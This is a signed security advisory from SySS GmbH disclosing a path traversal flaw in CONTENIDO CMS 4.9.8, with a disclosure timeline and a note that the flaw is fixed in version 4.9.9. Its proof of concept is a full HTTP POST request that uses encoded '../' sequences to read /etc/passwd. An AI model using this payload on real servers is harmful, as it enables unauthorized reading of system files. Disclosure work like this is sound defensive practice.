-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2016-012 Product: CONTENIDO Official Maintainer: four for business AG Affected Version(s): 4.9.8 Tested Version(s): 4.9.8 Vulnerability Type: Relative Path Traversal (CWE-23) Risk Level: High Solution Status: Fixed Maintainer Notification: 2016-02-18 Solution Date: 2016-02-24 Public Disclosure: 2016-04-18 CVE Reference: Not yet assigned Author of Advisory: Rainer Boie (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: CONTENIDO is an open source web content management system developed by four for business AG (see [1]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The SySS GmbH found out that a logged on back-end user with access to the logfiles can conduct a path traversal attack due to insufficient input validation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Using a fresh installation of CONTENIDO in version 4.9.8 logged on as a user with logfile access rights, the following HTTP POST request was used for a relative path traversal attack: POST /contenido/ajaxmain.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/contenido/main.php?area=system_log&frame=4&contenido=jhh1udcj6jgjlnd7gsrah5jbmrkbuk0t Content-Length: 58 Cookie: backend=jhh1udcj6jgjlnd7gsrah5jbmrkbuk0t Connection: keep-alive ajax=logfilecontent&logfile=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&numberOfLines=100 The content of the file /etc/passwd is then displayed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: This issue was fixed in version 4.9.9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2016-02-18: Vulnerability reported to four for business AG 2016-02-24: Maintainer four for business AG released security fix version 4.9.9 2016-04-18: SySS discloses the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Web site for CONTENIDO http://www.contenido.org [2] SySS Security Advisory SYSS-2016-012 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-012.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Rainer Boie of the SySS GmbH. E-Mail: rainer.boie (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Rainer_Boie.asc Key fingerprint = E724 9ECC 7E6F 1008 16AB 1A53 5C12 823D 608D 7AE9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCgAGBQJXKGhoAAoJEFwSgj1gjXrphbAIAITjr+n2C8LLoXupRPUcuiZK bTMEHWa3BaIQge1Ft+fNbjSSRA2WYFTnTXWa59aSO/hpPfmzYzQA6fXm6YOPwKun IcR/G6yXhhLrO04EoYo2FLAPo3EE0MBBTSiBB846//+QtsgFDkHCERKpXXCRtrDW IYWCrZf2VkVW0P65jGzwYqoyHALLc1qoOdCO+aHxKBGlgJhHP6aDYoLuVzIEClNI KiBQoasLMrJ0NjZiCnEm5Pl3LkA31S6JL0eNt51Z4EwHBtRGA7Wa0CQe8GYyYwjN XOkYooE7E8MH70b7SqAGAN5x0491ooprL8e12+rlVRNwiyG9BvcDxRP/+rc5CmY= =uDUh -----END PGP SIGNATURE-----